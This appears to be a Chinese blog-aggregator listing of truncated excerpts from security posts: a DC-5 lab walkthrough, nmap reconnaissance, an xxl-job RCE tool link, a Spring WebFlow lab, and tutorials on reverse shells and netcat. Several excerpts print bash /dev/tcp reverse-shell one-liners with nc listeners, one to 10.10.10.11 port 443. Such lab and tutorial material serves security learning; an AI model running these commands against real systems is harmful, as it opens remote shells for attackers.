DC-5 存活探测 端口扫描 从80入手 conract提交后,发现日期有变化,并且参数变量可控,猜测文件包含 尝试包含/etc/passwd 从日志文件入手 尝试写入shell 失败了很多次,恢复快照后,ip变了 反弹shell 返回交互式 中途断了一次,换了端口 python反弹 提权(/bin ...
分类:
其他好文 时间:
2021-03-16 11:54:54
阅读次数:
0
#0x00 信息收集 nmap -sV -Pn -A -T4 10.10.10.68 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4 ...
分类:
其他好文 时间:
2021-01-01 12:11:07
阅读次数:
0
bash -i >& /dev/tcp/ip/port 0>&1 服务器监听 nc -lvvp 9999 利用工具 https://github.com/mrknow001/xxl-job-rce bash反弹shell命令 https://www.cnblogs.com/supdon/p/1346 ...
前言什么是反弹shell(reverseshell)?就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverseshell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么需要反弹shell?反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在*过程中,往往因为端口限制而无法直连目标机
分类:
系统相关 时间:
2020-09-04 17:32:05
阅读次数:
54
0x00 实验环境 攻击机:Win 10 靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场)(兼顾反弹shell的攻击机) 0x01 影响版本 Spring WebFlow 2.4.0 - 2.4.4 0x02 实验步骤 首先,进入靶场环境,我们可以清晰地看到这个漏洞平台展 ...
分类:
编程语言 时间:
2020-07-22 23:37:28
阅读次数:
252
问题:crontab写别的定时脚本就可以执行(比如说每隔一分钟就创建一个txt文件),但是写shell就不知道为什么,反弹不了 但是开启Linux终端窗口单独执行bash shell时候,(不通过redis写shell),就可以再攻击机上监听到shell 环境 :Ubuntu 16 ; kali 2 ...
分类:
系统相关 时间:
2020-07-17 19:38:34
阅读次数:
83
--dns-servers 是复数,主要用于内部架设的dns服务器,外部dns无法解析.-Pn Treat all hosts as online skip host discovery 明确知道主机存活或防火墙开启的机器,-Pn不启用探测前的ICMP请求,达到不触发防火墙的安全机制 -F fast ...
分类:
其他好文 时间:
2020-07-08 09:14:15
阅读次数:
71
假设本机地址10.10.10.11,监听端口443。 1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i >& /dev/tcp/10.10.10.11/443 0>&1 /bin/bash -i > / ...
分类:
系统相关 时间:
2020-06-26 23:49:20
阅读次数:
66
bash环境获取shell 客户端 nc -lvp 8888 服务器 bash -i >& /dev/tcp/ip/port 0>&1 参考链接 https://blog.csdn.net/csacs/article/details/91440568 免责声明 严禁读者利用以上介绍知识点对网站进行非 ...
一、概述 nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp -v 参数,详细输出 -n参数,netcat不要DNS反向查询IP的域名 -z参数,连接成功后立即关闭连接 -l参数 监听 -p参数 指定... ...
分类:
Web程序 时间:
2020-05-19 14:38:58
阅读次数:
97